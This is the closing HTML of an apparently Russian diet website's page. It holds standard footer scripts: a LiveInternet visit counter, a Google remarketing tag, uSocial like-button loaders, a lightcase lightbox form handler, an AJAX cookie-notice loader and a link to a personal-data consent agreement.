            <!--LiveInternet counter--><script type="text/javascript"><!--
                document.write("<a href='//www.liveinternet.ru/click;WPMediaWomenGroup' "+
                    "target=_blank><img src='//counter.yadro.ru/hit;WPMediaWomenGroup?t12.6;r"+
                    escape(document.referrer)+((typeof(screen)=="undefined")?"":
                    ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
                        screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
                    ";h"+escape(document.title.substring(0,80))+";"+Math.random()+
                    "' alt='' title='LiveInternet: показано число просмотров за 24"+
                    " часа, посетителей за 24 часа и за сегодня' "+
                    "border='0' width='88' height='31'><\/a>")
                //--></script><!--/LiveInternet-->
        </noindex>
    </div>

    <script type="text/javascript" src="/hypercontext/main.js"></script>
    <!-- Код тега ремаркетинга Google -->
    <script type="text/javascript">
    /* <![CDATA[ */
    var google_conversion_id = 872460077;
    var google_custom_params = window.google_tag_params;
    var google_remarketing_only = true;
    /* ]]> */
    </script>
    <script type="text/javascript" src="//www.googleadservices.com/pagead/conversion.js">
    </script>
    <noscript>
    <div style="display:inline;">
    <img height="1" width="1" style="border-style:none;" alt="" src="//googleads.g.doubleclick.net/pagead/viewthroughconversion/872460077/?guid=ON&amp;script=0"/>
    </div>
    </noscript>

    <!-- uSocial uLike -->
    <script type="text/javascript">
        !function (a, b, c, d) {
            if (!a._uLikeInit_) {
                a._uLikeInit_ = !0;
                var e = b.createElement("script"), f = b.getElementsByTagName("body")[0], g = b.getElementsByTagName("head")[0];
                e.async = !0, e.setAttribute("data-script", 'usocial'), e.src = c + "?" + d, "undefined" == typeof f ? g.appendChild(e) : f.appendChild(e)
            }
        }(window, document, "https://usocial.pro/usocial/usocial.ulike.js", "v=6.1.4");
    </script>
    <!-- /uSocial uLike -->

    <!-- uSocial uLike informer -->
    <script type="text/javascript">
        !function (a, b, c, d) {
            if (!a._uLike_informer_init_) {
                a._uLike_informer_init_ = !0;
                var e = b.createElement("script"), f = b.getElementsByTagName("body")[0], g = b.getElementsByTagName("head")[0];
                e.async = !0, e.setAttribute("data-script", 'usocial'), e.src = c + "?" + d, "undefined" == typeof f ? g.appendChild(e) : f.appendChild(e)
            }
        }(window, document, "https://usocial.pro/usocial/usocial.ulike.informer.js", "v=1.0.0");
    </script>
    <!-- /uSocial uLike informer -->

<script type="text/javascript" src="http://www.azbukadiet.ru/wp-content/themes/logistix-3c_new/light/src/js/lightcase.js"></script>
<script type="text/javascript">
$(document).ready(function() {

    $('a[data-rel^=lightcase]').lightcase();
    $('#various2').lightcase({
            showSequenceInfo: false,
            type: 'ajax',
            ajax: {
                width: 650
            },
            onFinish: {
                // We need to initialize lightcase for the form which was loaded subsequently via ajax
                // what we are doing with an 'onFinish' hook function like the following one.
                initializeForm: function () {
                    lightcase.get('case').find('form[data-rel=lightcase]').on('submit', function (event) {
                        event.preventDefault();
                        var $this = $(this);
                        $this.lightcase('start', {
                            type: 'ajax',
                            href: $this.attr('action'),
                            ajax: {
                                width: 650,
                                type: $this.attr('method'),
                                dataType: 'html',
                                data: $this.serialize()
                            }
                        });
                    });
                }
            }
        });
        $.ajax({
          url: '/ajax/cookie.php',
          success: function(html){
            $('body').append(html);
          }
        });
});

</script>
<div><div class="agreementSog" style="text-align: center; text-decoration: underline; color: blue; cursor: pointer; font-size: 12px;"><a href="/agreement.php">Соглашение на обработку персональных данных</a></div></div>

    </body>
</html>
</div>